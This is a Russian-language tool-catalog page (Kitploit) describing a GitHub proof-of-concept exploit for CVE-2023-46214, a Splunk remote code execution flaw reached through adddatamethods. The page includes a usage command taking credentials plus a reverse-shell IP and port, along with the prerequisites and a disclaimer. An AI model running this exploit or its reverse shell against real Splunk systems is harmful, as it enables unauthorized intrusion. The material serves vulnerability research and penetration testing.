Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Splunk-RCE-poc — PoC-эксплойт на Python для CVE-2023-46214, использующий функцию adddatamethods в Splunk для удалённого выполнения кода через обратную оболочку. | Kitploit
Инструменты/GitHubGitHub/nathan31337/splunk-rce-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubnathan31337/splunk-rce-poc

Splunk-RCE-poc

PoC-эксплойт на Python для CVE-2023-46214, использующий функцию adddatamethods в Splunk для удалённого выполнения кода через обратную оболочку.

Репозиторий
114232 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Splunk RCE - PoC

Эксплойт Proof of Concept для CVE-2023-46214, SVD-2023-1104

poc

Использование

URL-адрес экземпляра Splunk, имя пользователя, пароль, IP-адрес reverse shell и порт — все они обязательны в качестве параметров командной строки. Например:

root@kitploit:~
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

Предварительные требования

  • Учётные данные Splunk с разрешением на загрузку в adddatamethods
    • Примечание: возможен и другой вектор, но это лишь тот, который использовал я
  • Splunk не работает в режиме SHC

Анализ

Я написал статью в блоге, в которой подробно описал методологию, использованную для обнаружения этой уязвимости. Если у вас возникают какие-либо проблемы со скриптом, статья может оказаться полезной, поскольку в ней описаны ручные шаги эксплуатации.

Анализ CVE-2023-46214 + PoC

Правовой отказ от ответственности

Скрипт Proof of Concept (PoC), предоставленный в этом репозитории, служит исключительно образовательным и исследовательским целям. Его назначение — продемонстрировать конкретную уязвимость и помочь в понимании связанных с ней рисков безопасности.

Любое использование этого скрипта для несанкционированных действий, включая, помимо прочего, несанкционированный доступ к системам, несанкционированное тестирование или другие формы неправомерного использования, категорически запрещено.

Создатели и участники этого репозитория снимают с себя всякую ответственность за неправомерное использование или любой ущерб и вред, возникшие в результате использования этого скрипта. Используя этот скрипт, вы соглашаетесь использовать его ответственно и на свой собственный риск.

Скачать инструмент